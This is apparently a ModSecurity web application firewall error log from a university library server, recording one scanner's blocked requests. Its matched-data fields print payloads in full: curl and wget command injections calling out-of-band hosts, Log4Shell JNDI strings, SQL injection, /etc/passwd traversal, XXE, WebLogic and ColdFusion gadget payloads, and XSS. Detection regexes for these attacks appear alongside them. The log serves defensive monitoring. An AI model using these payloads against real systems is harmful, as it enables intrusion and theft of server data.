[hostname "digilibfkip.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO10pcCo-f0AAAQKOcQAAAAs"]
[Tue Aug 29 11:31:33.655504 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:iface. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:iface: ;curl cjmn8l5jmimk2adbbnlghehznji4tpg64.oast.site/`whoami`;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ajax/networking/get_netcfg.php"] [unique_id "ZO10pcCo-f0AAANsASYAAAAD"]
[Tue Aug 29 11:31:34.400432 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param: 1' and updatexml(1,concat(0x7e,(SELECT md5(999999999)),0x7e),1)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/sms_check.php"] [unique_id "ZO10psCo-f0AAAP@MzwAAAAZ"]
[Tue Aug 29 11:31:35.381421 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pubid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:pubid: 4'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/ebook/bookPerPub.php"] [unique_id "ZO10p8Co-f0AAAQUH-AAAAA2"]
[Tue Aug 29 11:31:36.356871 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:host:  cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/api/ping"] [unique_id "ZO10qMCo-f0AAAQkBWQAAAAC"]
[Tue Aug 29 11:31:36.399029 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-808}${:-319}.${hostName}.username.cjmn8l5jmimk2adbbnlgwfuktp7ikzwef.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO10qMCo-f0AAAQEGLUAAAAm"]
[Tue Aug 29 11:31:37.338444 2023] [:error] [pid 1061] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:discount_code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:discount_code: '  union select sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO10qcCo-f0AAAQlGRAAAAAF"]
[Tue Aug 29 11:31:37.457309 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: dw1' or 1=1 #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/zms/admin/index.php"] [unique_id "ZO10qcCo-f0AAAQmR34AAAAH"]
[Tue Aug 29 11:31:38.303390 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ztd_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ztd_password: $(/bin/wget$IFShttp:/cjmn8l5jmimk2adbbnlggu9wuz659mfs1.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/Collector/nms/addModifyZTDProxy"] [unique_id "ZO10qsCo-f0AAAN@5HgAAAAO"]
[Tue Aug 29 11:31:38.425797 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:username: ;`curl cjmn8l5jmimk2adbbnlg8ieuyhpgdqesc.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/login"] [unique_id "ZO10qsCo-f0AAAQmR4IAAAAH"]
[Tue Aug 29 11:31:38.601650 2023] [:error] [pid 1062] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:day. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:day: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/module/smartblog/archive"] [unique_id "ZO10qsCo-f0AAAQmR4UAAAAH"]
[Tue Aug 29 11:31:39.411356 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:payload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22 ?><! found within ARGS:payload: <?xml version=\\x221.0\\x22 ?><!DOCTYPE a [ <!ENTITY % xxe SYSTEM \\x22http://cjmn8l5jmimk2adbbnlgnsp8185r337w5.oast.site\\x22>%xxe;]>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/carbon/generic/save_artifact_ajaxprocessor.jsp"] [unique_id "ZO10q8Co-f0AAAQkBXAAAAAC"]
[Tue Aug 29 11:31:40.372102 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "digilibfkip.unla.ac.id"] [uri "/Config/SaveUploadedHotspotLogoFile"] [unique_id "ZO10rMCo-f0AAAN@5IEAAAAO"]
[Tue Aug 29 11:31:41.592576 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at REQUEST_COOKIES:wpsc_guest_login_auth. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within REQUEST_COOKIES:wpsc_guest_login_auth: {\\x22email\\x22:\\x22' AND (SELECT 42 FROM (SELECT(SLEEP(6)))NNTu)-- cLmu\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO10rcCo-f0AAAQA-@MAAAAi"]
[Tue Aug 29 11:31:43.320348 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:folder. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:folder: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10r8Co-f0AAAQFcT8AAAAn"]
[Tue Aug 29 11:31:44.316605 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibfkip.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQMrvMAAAAu"]
[Tue Aug 29 11:31:44.316681 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibfkip.unla.ac.id"] [uri "/soap.cgi"] [unique_id "ZO10sMCo-f0AAAQMrvMAAAAu"]
[Tue Aug 29 11:31:44.353615 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:meta_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:meta_ids: 1 AND (SELECT 3066 FROM (SELECT(SLEEP(6)))CEHy)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10sMCo-f0AAAQNwH0AAAAv"]
[Tue Aug 29 11:31:44.358014 2023] [:error] [pid 1009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  = ( found within ARGS:handle: com.tangosol.coherence.mvel2.sh.ShellSession(\\x22weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\\x0d\\x0aweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\\x0d\\x0ajava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\x22connectionHandler\\x22);\\x0d\\x0afield.setAccessible(true);\\x0d\\x0aObject obj = field.get(adapter);\\x0d\\x0aweblogic.servlet.internal.ServletRequestImpl req = (weblog..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/console/css/%2e%2e%2fconsole.portal"] [unique_id "ZO10sMCo-f0AAAPxBXgAAAAS"]
[Tue Aug 29 11:31:44.361392 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:progressfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:progressfile: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/usc-e-shop/functions/progress-check.php"] [unique_id "ZO10sMCo-f0AAAQV4O8AAAA3"]
[Tue Aug 29 11:31:45.321090 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:argumentCollection. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '/></ found within ARGS:argumentCollection: <wddxPacket version='1.0'><header/><data><struct type='xcom.sun.rowset.JdbcRowSetImplx'><var name='dataSourceName'><string>ldap://cjmn8l5jmimk2adbbnlgkyub1jpixjq14.oast.site/rcrzfd</string></var><var name='autoCommit'><boolean value='true'/></var></struct></data></wddxPacket>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/CFIDE/adminapi/accessmanager.cfc"] [unique_id "ZO10scCo-f0AAAPiBk0AAAAB"]
[Tue Aug 29 11:31:45.465603 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: (SELECT 1337 FROM (SELECT(SLEEP(6)))MrMV)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10scCo-f0AAAQFcUUAAAAn"]
[Tue Aug 29 11:31:46.357562 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAQSWOQAAAA0"]
[Tue Aug 29 11:31:47.360626 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAQnF4MAAAAF"]
[Tue Aug 29 11:31:47.450523 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAQQymUAAAAy"]
[Tue Aug 29 11:31:49.322946 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAP6NP0AAAAQ"]
[Tue Aug 29 11:31:50.327776 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAQMrwQAAAAu"]
[Tue Aug 29 11:31:50.379570 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAQV4P8AAAA3"]
[Tue Aug 29 11:31:50.445319 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgcefrxton51tsj.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\b\\xb7\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlghz8hnms4cwz1u.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10tsCo-f0AAAPDn9YAAAAP"]
[Tue Aug 29 11:31:51.319776 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "digilibfkip.unla.ac.id"] [uri "/\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgtkzw544u4owyn.oast.site+-H+'User-Agent:+LGgfDE'};\\x04\\xd7\\x7f\\xbf\\x18\\xd8\\x7f\\xbf\\x18\\xd8\\x7f\\xbfd\\xb8\\x06\\b;{curl,http:/cjmn8l5jmimk2adbbnlgpr6xhxtggtrqr.oast.site+-H+'User-Agent:+LGgfDE'};"] [unique_id "ZO10t8Co-f0AAAQnF5AAAAAF"]
[Tue Aug 29 11:31:51.347737 2023] [:error] [pid 1037] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wiki/pages/createpage-entervariables.action"] [unique_id "ZO10t8Co-f0AAAQNwJMAAAAv"]
[Tue Aug 29 11:31:51.404709 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: No boundaries found in payload."] [severity "CRITICAL"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10t8Co-f0AAAP@M38AAAAZ"]
